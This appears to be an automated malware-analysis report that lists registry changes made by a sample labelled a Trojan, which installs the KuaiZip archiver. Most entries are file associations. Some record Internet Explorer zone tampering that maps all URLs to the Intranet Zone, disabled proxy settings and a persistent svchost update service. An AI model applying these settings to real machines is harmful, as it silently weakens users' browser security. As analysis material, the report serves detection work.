[HKCR\KuaiZip.7z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,3"
[HKCR\KuaiZip.098\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.070\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.075]
"(Default)" = "NoAssociate.KZ"
[HKCR\.044]
"(Default)" = "KuaiZip.044"
[HKCR\KuaiZip.014\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.072]
"set" = "1"
[HKCR\KuaiZip.039\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.gz]
"(Default)" = "KuaiZip.gz"
[HKCR\KuaiZip.050\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.098]
"set" = "1"
[HKCR\KuaiZip.088]
"(Default)" = "快压 088 压缩文件"
[HKCR\KuaiZip.057]
"(Default)" = "快压 057 压缩文件"
[HKCR\KuaiZip.061]
"(Default)" = "快压 061 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.029]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.065]
"set" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\.08]
"(Default)" = "KuaiZip.08"
[HKCR\.033]
"(Default)" = "KuaiZip.033"
[HKCR\.tgz]
"(Default)" = "KuaiZip.tgz"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\KuaiZip.rpm\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.078]
"(Default)" = "KuaiZip.078"
[HKCR\KuaiZip.091]
"(Default)" = "快压 091 压缩文件"
[HKCR\KuaiZip.068\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.09\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.049]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.008]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.05\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.065]
"(Default)" = "KuaiZip.065"
[HKCR\.063]
"(Default)" = "KuaiZip.063"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.079]
"set" = "1"
[HKCR\KuaiZip.092]
"(Default)" = "快压 092 压缩文件"
[HKCR\KuaiZip.040]
"(Default)" = "快压 040 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.rar]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.tar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.029]
"(Default)" = "快压 029 压缩文件"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.rar]
"set" = "1"
[HKCR\KuaiZip.080]
"(Default)" = "快压 080 压缩文件"
[HKCR\KuaiZip.024\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.jar]
"(Default)" = "jarfile"
[HKCR\KuaiZip.076\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.096]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.013]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.044\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.022]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.097]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.027]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.04]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.035]
"(Default)" = "快压 035 压缩文件"
[HKCR\KuaiZip.081\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.062\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.050]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.099\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.029\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.024\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.070]
"(Default)" = "快压 070 压缩文件"
[HKCR\.zip]
"(Default)" = "KuaiZip.zip"
[HKCR\KuaiZip.082]
"(Default)" = "快压 082 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.090]
"(Default)" = "NoAssociate.KZ"
[HKCR\.084]
"(Default)" = "KuaiZip.084"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.011]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.001]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.057]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.08\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.079\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.007]
"set" = "1"
[HKCR\KuaiZip.087\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.043]
"(Default)" = "KuaiZip.043"
[HKCR\KuaiZip.09\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.z]
"(Default)" = "快压 Z 压缩文件"
[HKCR\.045]
"(Default)" = "KuaiZip.045"
[HKCR\KuaiZip.030]
"(Default)" = "快压 030 压缩文件"
[HKCR\KuaiZip.076\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.078]
"(Default)" = "快压 078 压缩文件"
[HKCR\KuaiZip.026]
"(Default)" = "快压 026 压缩文件"
[HKCR\KuaiZip.7z\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.005\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.077]
"(Default)" = "快压 077 压缩文件"
[HKCR\KuaiZip.062]
"(Default)" = "快压 062 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.076]
"set" = "1"
[HKCR\.036]
"(Default)" = "KuaiZip.036"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.045]
"set" = "1"
[HKCR\KuaiZip.036\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.081]
"set" = "1"
[HKCR\KuaiZip.007\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.066]
"(Default)" = "快压 066 压缩文件"
[HKCR\KuaiZip.089\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.001]
"(Default)" = "快压 001 压缩文件"
[HKCR\KuaiZip.051\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.rpm]
"set" = "1"
[HKCR\KuaiZip.008\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.081]
"(Default)" = "快压 081 压缩文件"
[HKCR\KuaiZip.05]
"(Default)" = "快压 05 压缩文件"
[HKCR\.011]
"(Default)" = "KuaiZip.011"
[HKCR\KuaiZip.027\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.013]
"(Default)" = "快压 013 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.031]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.039\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.zip\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.059\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.021\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.07]
"set" = "1"
[HKCR\KuaiZip.cab]
"(Default)" = "快压 CAB 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\KuaiZip.003\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.054\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.069\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tgz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.068]
"(Default)" = "快压 068 压缩文件"
[HKCR\.005]
"(Default)" = "KuaiZip.005"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.052]
"set" = "1"
[HKCR\KuaiZip.056]
"(Default)" = "快压 056 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.077]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.058]
"set" = "1"
[HKCR\.081]
"(Default)" = "KuaiZip.081"
[HKCR\KuaiZip.06]
"(Default)" = "快压 06 压缩文件"
[HKCR\KuaiZip.mou\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.031\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.031]
"set" = "1"
[HKCR\.bz2]
"(Default)" = "KuaiZip.bz2"
[HKCR\.069]
"(Default)" = "KuaiZip.069"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.033]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.034]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.066]
"set" = "1"
[HKCR\.029]
"(Default)" = "KuaiZip.029"
[HKCR\KuaiZip.070\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.015]
"(Default)" = "快压 015 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.033]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.051]
"(Default)" = "快压 051 压缩文件"
[HKCR\.05]
"(Default)" = "KuaiZip.05"
[HKCR\.rpm]
"(Default)" = "KuaiZip.rpm"
[HKCR\KuaiZip_FileAsso.Origin\.036]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.088]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tbz]
"set" = "1"
[HKCR\KuaiZip.097\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.018\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.070]
"set" = "1"
[HKCR\KuaiZip.088\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.072\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.086]
"(Default)" = "快压 086 压缩文件"
[HKCR\KuaiZip.lzh\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.008\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.026\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.016\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.039]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.070]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.028]
"set" = "1"
[HKCR\.04]
"(Default)" = "KuaiZip.04"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.084]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.026]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.041]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.017\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.052]
"(Default)" = "KuaiZip.052"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.071]
"set" = "1"
[HKCR\KuaiZip.012]
"(Default)" = "快压 012 压缩文件"
[HKCR\.082]
"(Default)" = "KuaiZip.082"
[HKCR\KuaiZip.095\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.095]
"(Default)" = "快压 095 压缩文件"
[HKCR\KuaiZip.072\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.094]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.016]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.094\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.lzh\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.006\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.080\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.043\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.054]
"(Default)" = "KuaiZip.054"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.gzip]
"set" = "1"
[HKCR\KuaiZip.075\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.052\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.015\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.071]
"(Default)" = "KuaiZip.071"
[HKCR\KuaiZip.029\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.7z]
"set" = "1"
[HKCR\KuaiZip.rar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,4"
[HKCR\KuaiZip.086\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.mou]
"(Default)" = "快压 MOU 压缩文件"
[HKCR\.053]
"(Default)" = "KuaiZip.053"
[HKCR\KuaiZip.064\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.09]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.049]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.045]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.009]
"set" = "1"
[HKCR\KuaiZip.rpm]
"(Default)" = "快压 RPM 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.087]
"set" = "1"
[HKCR\KuaiZip.07\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.065]
"(Default)" = "快压 065 压缩文件"
[HKCR\KuaiZip.063]
"(Default)" = "快压 063 压缩文件"
[HKCR\KuaiZip.tgz]
"(Default)" = "快压 TGZ 压缩文件"
[HKCR\.7z]
"(Default)" = "KuaiZip.7z"
[HKCR\.arj]
"(Default)" = "KuaiZip.arj"
[HKCR\KuaiZip.002\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.034\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.rpm]
"(Default)" = "NoAssociate.KZ"
[HKCR\.026]
"(Default)" = "KuaiZip.026"
[HKCR\KuaiZip.045\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.jar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.rar]
"(Default)" = "KuaiZip.rar"
[HKCR\KuaiZip_FileAsso.Origin\.006]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.056]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.01\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\KuaiZip_FileAsso.Origin\.067]
"(Default)" = "NoAssociate.KZ"
[HKCR\.034]
"(Default)" = "KuaiZip.034"
[HKCR\KuaiZip.092\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tbz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.085\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.095]
"set" = "1"
[HKCR\KuaiZip.045\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.040]
"set" = "1"
[HKCR\KuaiZip.042]
"(Default)" = "快压 042 压缩文件"
[HKCR\.003]
"(Default)" = "KuaiZip.003"
[HKCR\KuaiZip.097\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.025\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.032]
"(Default)" = "KuaiZip.032"
[HKCR\KuaiZip.060\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.zip]
"(Default)" = "CompressedFolder"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.068]
"set" = "1"
[HKCR\KuaiZip.062\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.056]
"(Default)" = "KuaiZip.056"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones so that all local web-nodes with no dots, which do not refer to any zone, are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process %original file name%.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 97 38 C1 E3 EE 52 B2 C1 C2 DA FF 7B D4 41 0D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process net.exe:1864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 7F 6C EA 58 8F 2F FB 76 72 7B E6 4E 38 F1 3B"
The process regsvr32.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 EB 42 34 75 46 46 19 1E 27 0C 0A 78 DF 08 97"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件升级检查服务"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"
The process regsvr32.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 07 07 3A 21 DC A7 0B 46 B7 92 BC 32 FB 47 3E"
The process regsvr32.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}]
"(Default)" = "KzShlobj Class"
[HKCR\KuaiZip.zip\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.PropertyExt\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"
[HKCR\QZipShell.DragDropMenu\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\QZipShell.KYDropHandler]
"(Default)" = "KYDropHandler Class"
[HKCR\QZipShell.ContextMenuExt.1]
"(Default)" = "ContextMenuExt Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"KuaiZip Shell Extension" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\ProgID]
"(Default)" = "QZipShell.KzShlobj.1"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\VersionIndependentProgID]
"(Default)" = "QZipShell.KYDropHandler"
[HKCR\QZipShell.ContextMenuExt]
"(Default)" = "ContextMenuExt Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}]
"(Default)" = "IKzShlobj"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\ProgID]
"(Default)" = "QZipShell.ContextMenuExt.1"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\QZipShell.KYDropHandler.1\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.DragDropMenu.1\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\ProgID]
"(Default)" = "QZipShell.PropertyExt.1"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\ProgID]
"(Default)" = "QZipShell.DragDropMenu.1"
[HKCR\QZipShell.KYDropHandler\CurVer]
"(Default)" = "QZipShell.KYDropHandler.1"
